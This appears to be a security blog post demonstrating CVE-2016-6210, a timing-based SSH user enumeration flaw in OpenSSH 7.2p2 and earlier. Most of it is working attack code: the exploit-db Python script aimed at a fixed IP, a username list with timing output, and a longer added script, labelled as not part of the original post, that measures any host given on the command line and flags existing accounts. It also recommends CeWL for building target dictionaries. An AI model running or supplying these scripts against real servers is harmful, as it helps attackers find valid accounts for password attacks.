On the 13th of July a new wild CVE appeared (yes, Pokemon Go is still the buzz of the moment).
CVE-2016-6210 allows user enumeration on an SSH server by comparing the response time for a nonexistent user with the response time for a real one. It affects OpenSSH sshd up to and including 7.2p2 (fixed in 7.3) when user passwords are hashed with SHA-256 or SHA-512 crypt: a real user's password goes through the full crypt() computation, while a nonexistent user is checked against a static Blowfish hash, which is far cheaper for a very long password. The server also has to offer password authentication, otherwise there is nothing to time.
That means that with a good dictionary you can find out which users exist on the server with SSH access.
This post simply demonstrates how to exploit this vulnerability with a small example.
OpenSSHD <= 7.2p2 - User Enumeration
A tiny Python script is available on exploit-db. I had to modify it a bit in order to pass the username as a command-line argument:

```python
#!/usr/bin/env python
import paramiko
import sys
import time

# username to test, passed as the first argument
user = sys.argv[1]
# very long password: the time sshd spends hashing it is what leaks the difference
p = 'A' * 25000

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# wall-clock time; time.clock() would report CPU time on Linux, not the wait on the server
starttime = time.time()
try:
    ssh.connect('192.168.4.231', username=user, password=p)
except Exception:
    # the attempt is expected to fail: we only care about how long it took
    pass
endtime = time.time()
total = endtime - starttime
print(str(user) + ": " + str(total))
```
The script simply tries to connect to 192.168.4.231 with the user passed as argument and a password of 25 000 'A', and measures how long the connection attempt takes.
We create a small list of candidate users, including one that certainly does not exist, so that we have a baseline to compare the connection times against.
```
[maggick@computer_name tmp]$ cat list
nonExistsingUserForSure
john
root
bob
user
alice
max
ssh_user
```

We run the script against our test server:

```
[maggick@computer_name tmp]$ while read l; do ./p.py $l; done < list
nonExistsingUserForSure: 0.17941999999999997
john: 0.18687900000000002
root: 0.18173099999999998
bob: 0.178726
user: 0.23088699999999995
alice: 0.13389600000000002
max: 0.17069700000000004
ssh_user: 0.24780699999999997
```
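A single measurement per name, as above, is noisy. The following script is an added example, not the exploit-db script and not part of the original post: it takes several samples per username, interleaves them so that network drift hits every name equally, and reports the names whose median is clearly slower than the median of a username known not to exist. The host and user list on the command line, the five samples per name and the 20 % threshold are assumptions; the SAMPLE_TIMINGS data is constructed to mirror the run above so that the analysis part runs offline without a target (paramiko is only imported in live mode).

```python
#!/usr/bin/env python3
"""Timing-based user enumeration against OpenSSH <= 7.2p2 (CVE-2016-6210),
with several samples per name and a median comparison against a baseline."""
import statistics
import sys
import time

LONG_PASSWORD = "A" * 25000          # long input makes the crypt() cost dominate
BASELINE_USER = "nonExistsingUserForSure"   # assumed not to exist on the target


def time_password_attempt(host, user, password=LONG_PASSWORD, port=22):
    """Wall-clock seconds for one password attempt (expected to fail)."""
    import paramiko                  # imported here so the offline analysis runs without it
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    start = time.perf_counter()
    try:
        ssh.connect(host, port=port, username=user, password=password,
                    look_for_keys=False, allow_agent=False)
    except paramiko.BadAuthenticationType:
        # no "password" method offered: sshd never hashes anything, the attack does not apply
        raise SystemExit("server does not offer password authentication")
    except paramiko.AuthenticationException:
        pass                         # the normal outcome: wrong password
    finally:
        elapsed = time.perf_counter() - start
        ssh.close()
    return elapsed


def collect_samples(host, users, samples=5):
    """Measure every user `samples` times, round-robin, so drift affects all names equally."""
    timings = {u: [] for u in users}
    for _ in range(samples):
        for u in users:
            timings[u].append(time_password_attempt(host, u))
    return timings


def classify(timings, baseline_user=BASELINE_USER, ratio=1.2):
    """Return {user: median} for users whose median is at least `ratio` times the
    baseline median. Anything at or below the baseline is indistinguishable from a
    nonexistent account, which is also how a locked or rejected account behaves."""
    baseline = statistics.median(timings[baseline_user])
    found = {}
    for user, values in timings.items():
        if user == baseline_user:
            continue
        med = statistics.median(values)
        if med >= baseline * ratio:
            found[user] = med
    return found


# Constructed samples (five runs per name, shaped like the single run in the post)
SAMPLE_TIMINGS = {
    "nonExistsingUserForSure": [0.179, 0.181, 0.175, 0.183, 0.178],
    "root":     [0.182, 0.179, 0.184, 0.177, 0.180],
    "alice":    [0.134, 0.176, 0.179, 0.181, 0.177],   # one outlier no longer matters
    "user":     [0.231, 0.228, 0.240, 0.235, 0.229],
    "ssh_user": [0.248, 0.251, 0.244, 0.250, 0.247],
}

if __name__ == "__main__":
    if len(sys.argv) > 1:            # live mode: ./enum.py HOST user1 user2 ...
        host, users = sys.argv[1], [BASELINE_USER] + sys.argv[2:]
        data = collect_samples(host, users)
    else:                            # offline demo on the constructed data
        data = SAMPLE_TIMINGS
    for user, med in sorted(classify(data).items(), key=lambda kv: -kv[1]):
        print("%-25s median %.3fs  -> account exists" % (user, med))
```

Run without arguments it reports user and ssh_user from the constructed data; with a host and a list of names it performs the measurements itself. The median rather than the mean is used so that a single slow or fast outlier (like the alice sample in the run above) does not flip the verdict.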
We can see that root responds in the same time as the nonexistent user, so root login is disallowed (sshd handles an account it will not accept exactly like an unknown one), and that the users user and ssh_user exist and are allowed to connect to the server over SSH. Single samples are noisy (alice comes out faster than the baseline), so in practice each name should be measured several times and the medians compared.
As often with brute force, the main difficulty is building the dictionary, but tools like CeWL from digininja can help generate one from the target's own web content.